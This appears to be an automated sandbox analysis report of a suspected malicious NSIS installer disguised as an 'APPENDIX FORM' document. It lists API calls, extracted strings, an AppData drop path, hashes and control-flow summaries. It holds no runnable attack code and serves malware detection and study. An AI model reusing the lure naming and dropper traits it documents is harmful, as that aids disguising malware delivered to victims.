• C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen, xrefs: 004020C6
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID: C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen
• API String ID: 123533781-3057813021
• Opcode ID: 383f66a66d934abd9f3f3178fbf5672efebc84ad60d76e5fc4df36bef25dc3c1
• Instruction ID: 34466b742f5b7f0ef11a407c973c2c4f52777fa67faea27571742bc3feca770d
• Opcode Fuzzy Hash: 383f66a66d934abd9f3f3178fbf5672efebc84ad60d76e5fc4df36bef25dc3c1
• Instruction Fuzzy Hash: 66416BB5A00205BFCB00EFA4CD88E9D7BB6AF88314F204169F905FB2E5DA79D941DB14
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eadc838c817926bcbe80dad00e1adb541f194e0ade0e3c9be9dd58be48476283
• Instruction ID: 1e8d97365fb74901917855b8d794782cfd73437813f55072e0905c4e61bb52af
• Opcode Fuzzy Hash: eadc838c817926bcbe80dad00e1adb541f194e0ade0e3c9be9dd58be48476283
• Instruction Fuzzy Hash: 41F16771D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
APIs
• FindFirstFileA.KERNELBASE(?,00421530,luggages.con,004058A1,luggages.con,luggages.con,00000000,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00405FEF
• FindClose.KERNEL32(00000000), ref: 00405FFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: luggages.con
• API String ID: 2295610775-617196232
• Opcode ID: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
• Instruction ID: 1e08b63c4c31002ca59ce0d5230fdf1f863f0ee0e5f08ecdecd469b2b4c040a3
• Opcode Fuzzy Hash: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
• Instruction Fuzzy Hash: F0D022319080306BC3004738BC0C84BBA189F15334B528A33B026F22F0E3389C6286ED
APIs
• GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
• LoadLibraryA.KERNELBASE(?,?,?,0040325E,00000008), ref: 00406028
• GetProcAddress.KERNEL32(00000000,?), ref: 00406039
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID:
• API String ID: 310444273-0
• Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
• Instruction ID: 10f3e354b7829c8e9003ad98279f9f7bccab2419aed8ef8d4a0e83e21ba2f2d8
• Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
• Instruction Fuzzy Hash: 13E0CD32D041116BC3109B749D44D3773ACAFD4751305483DF505F2151D734AC11E7A9
APIs
• FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402656
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: b2468e045f53200862a3d654f355ae0e6101b774f40fc91e5348c45abf24e7e8
• Instruction ID: d9a307b5197dbc1d43d3591fa654eb399071c8ad99f3bb71004d32988c2edbcd
• Opcode Fuzzy Hash: b2468e045f53200862a3d654f355ae0e6101b774f40fc91e5348c45abf24e7e8
• Instruction Fuzzy Hash: 18F0E572508214ABD700EBB49D49AFEB368DB11324F6046BBE101F20C1D6B84A42DB2E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 113 403769-403781 call 40600b 116 403783-403793 call 405c3e 113->116 117 403795-4037c6 call 405bc7 113->117 125 4037e9-403812 call 403a2e call 40585e 116->125 121 4037c8-4037d9 call 405bc7 117->121 122 4037de-4037e4 lstrcatA 117->122 121->122 122->125 131 403818-40381d 125->131 132 403899-4038a1 call 40585e 125->132 131->132 133 40381f-403843 call 405bc7 131->133 138 4038a3-4038aa call 405d02 132->138 139 4038af-4038d4 LoadImageA 132->139 133->132 142 403845-403847 133->142 138->139 140 403955-40395d call 40140b 139->140 141 4038d6-403906 RegisterClassA 139->141 156 403967-403972 call 403a2e 140->156 157 40395f-403962 140->157 144 403a24 141->144 145 40390c-403950 SystemParametersInfoA CreateWindowExA 141->145 147 403858-403864 lstrlenA 142->147 148 403849-403856 call 40579b 142->148 152 403a26-403a2d 144->152 145->140 149 403866-403874 lstrcmpiA 147->149 150 40388c-403894 call 405770 call 405ce0 147->150 148->147 149->150 155 403876-403880 GetFileAttributesA 149->155 150->132 159 403882-403884 155->159 160 403886-403887 call 4057b7 155->160 166 403978-403995 ShowWindow LoadLibraryA 156->166 167 4039fb-403a03 call 40509d 156->167 157->152 159->150 159->160 160->150 169 403997-40399c LoadLibraryA 166->169 170 40399e-4039b0 GetClassInfoA 166->170 174 403a05-403a0b 167->174 175 403a1d-403a1f call 40140b 167->175 169->170 172 4039b2-4039c2 GetClassInfoA RegisterClassA 170->172 173 4039c8-4039f9 DialogBoxParamA call 40140b call 4036b9 170->173 172->173 173->152 174->157 178 403a11-403a18 call 40140b 174->178 175->144 178->157
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040600B: GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
                                                                                                                • Part of subcall function 0040600B: LoadLibraryA.KERNELBASE(?,?,?,0040325E,00000008), ref: 00406028
                                                                                                                • Part of subcall function 0040600B: GetProcAddress.KERNEL32(00000000,?), ref: 00406039
                                                                                                              • lstrcatA.KERNEL32(1033,0041FCE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCE0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\,771B3410,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",00000000), ref: 004037E4
                                                                                                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry,1033,0041FCE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCE0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\), ref: 00403859
                                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 0040386C
                                                                                                              • GetFileAttributesA.KERNEL32(Call), ref: 00403877
                                                                                                              • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry), ref: 004038C0
                                                                                                                • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
                                                                                                              • RegisterClassA.USER32(00422E80), ref: 004038FD
                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403915
                                                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040394A
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403980
                                                                                                              • LoadLibraryA.KERNEL32(RichEd20), ref: 00403991
                                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 0040399C
                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 004039AC
                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 004039B9
                                                                                                              • RegisterClassA.USER32(00422E80), ref: 004039C2
                                                                                                              • DialogBoxParamA.USER32(?,00000000,00403AFB,00000000), ref: 004039E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                              • API String ID: 914957316-2898688249
                                                                                                              • Opcode ID: a3c0fce786b9f42c68720e8c2bfe396006c4e60de18e8b6b2c5074881c4ae853
                                                                                                              • Instruction ID: 57fda68e32d43d3754214604e7ed5e061be8654ed587f540489ffd1693c16f19
                                                                                                              • Opcode Fuzzy Hash: a3c0fce786b9f42c68720e8c2bfe396006c4e60de18e8b6b2c5074881c4ae853
                                                                                                              • Instruction Fuzzy Hash: 6961B3B16442007ED320AF659D45F2B3E6CEB4474AF40457FF944B22E1D7BD6D029A2E

                                                                                                              Control-flow Graph
                                                                                                              • Legend: Executed / Not Executed
                                                                                                              • Graph for the function starting at 00402C7B (basic blocks 402c7b through 402f1e; calls GetTickCount, GetModuleFileNameA, GetFileSize, GlobalAlloc, CreateFileA); the rendered graph is not reproduced here
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402C8F
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,00000400), ref: 00402CAB
                                                                                                                • Part of subcall function 00405971: GetFileAttributesA.KERNELBASE(?,00402CBE,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00405975
                                                                                                                • Part of subcall function 00405971: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405997
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00402CF4
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E3B
                                                                                                              Strings
                                                                                                              • 3h), xrefs: 00402CFC
                                                                                                              • Error launching installer, xrefs: 00402CCB
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C88, 00402E53
                                                                                                              • C:\Users\user\Desktop, xrefs: 00402CD6, 00402CDB, 00402CE1
                                                                                                              • C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe, xrefs: 00402C95, 00402CA4, 00402CB8, 00402CD5
                                                                                                              • soft, xrefs: 00402D6B
                                                                                                              • "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe", xrefs: 00402C7B
                                                                                                              • Null, xrefs: 00402D74
                                                                                                              • Inst, xrefs: 00402D62
                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$3h)$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                              • API String ID: 2803837635-775497101
                                                                                                              • Opcode ID: 7d722e52d5d1ced09d0b69b569fd759111e039131ac18ea1231b4960ba6c6cec
                                                                                                              • Instruction ID: 9de56974c203d5571711bd7ea282ed8ac83b373a822f3244ccbcaf21db740533
                                                                                                              • Opcode Fuzzy Hash: 7d722e52d5d1ced09d0b69b569fd759111e039131ac18ea1231b4960ba6c6cec
                                                                                                              • Instruction Fuzzy Hash: 1061E471A40205ABDB20AF65DE49B9E76B8EB14315F20403BF905B72D1D7BC9D408B9C
                                                                                                              APIs
                                                                                                                • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,?), ref: 1000121D
                                                                                                                • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,?), ref: 10001258
                                                                                                                • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B90
                                                                                                              • lstrcpyA.KERNEL32(00000008,?), ref: 10001BD8
                                                                                                              • lstrcpyA.KERNEL32(00000408,?), ref: 10001BE2
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001BF5
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CED
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CF2
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001CF7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001E98
                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 10001FEC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$lstrcpy$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 4227406936-0
                                                                                                              • Opcode ID: 69f3a9b2a18921e2892b8c7150752c2e8c75d51f0f9cb65df36350bdcad77393
                                                                                                              • Instruction ID: 74db159a9f3e7a36040566df0065e2a6036ec1a3b8bd981beb6e548db383e329
                                                                                                              • Opcode Fuzzy Hash: 69f3a9b2a18921e2892b8c7150752c2e8c75d51f0f9cb65df36350bdcad77393
                                                                                                              • Instruction Fuzzy Hash: BA128A71D0464ADEFB20CFA4C8817EEBBF4FB043D4F21852AD555A3288DB749A81CB51

                                                                                                              Control-flow Graph
                                                                                                              • Legend: Executed / Not Executed
                                                                                                              • Graph for the function starting at 0040173F (basic blocks 40173f through 4028a3; calls lstrcatA, CompareFileTime, SetFileTime, CloseHandle); the rendered graph is not reproduced here
                                                                                                              APIs
                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen,00000000,00000000,00000031), ref: 0040177E
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen,00000000,00000000,00000031), ref: 004017A8
                                                                                                                • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,Centraleuropisk Setup,NSIS Error), ref: 00405CED
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp$C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp\System.dll$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen$Call
                                                                                                              • API String ID: 1941528284-2670399011
                                                                                                              • Opcode ID: 09760604a39c9fc38cc97cf03cd4f78144b4080378c59d2037bdc54a19b13dc2
                                                                                                              • Instruction ID: dcaa159d3d65cf46b394741f05a2eb50de91680975dac2d9d0f3c2bd51607c2a
                                                                                                              • Opcode Fuzzy Hash: 09760604a39c9fc38cc97cf03cd4f78144b4080378c59d2037bdc54a19b13dc2
                                                                                                              • Instruction Fuzzy Hash: 2441C671904515BADF10BB69DC46EAF3568EF01368F20823BF121B10E1DA7C4A419A6D

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401D29
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                              • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Calibri
• API String ID: 3808545654-1409258342
• Opcode ID: 81c73d9e8679907cff4745bd34847c755520c3b134f4d90f90dc5b578de1b815
• Instruction ID: 5399a24e5cdce0b27410f2cdff9dfddad5b6d8cdd0e7a6f2869d00f867cec74d
• Opcode Fuzzy Hash: 81c73d9e8679907cff4745bd34847c755520c3b134f4d90f90dc5b578de1b815
• Instruction Fuzzy Hash: C0016271968340AFEB015BB0AE4AB9A3FB4E715705F108479F541B72E2C57844159B2B

Control-flow Graph of the function at 40303c
APIs
• GetTickCount.KERNEL32 ref: 00403051
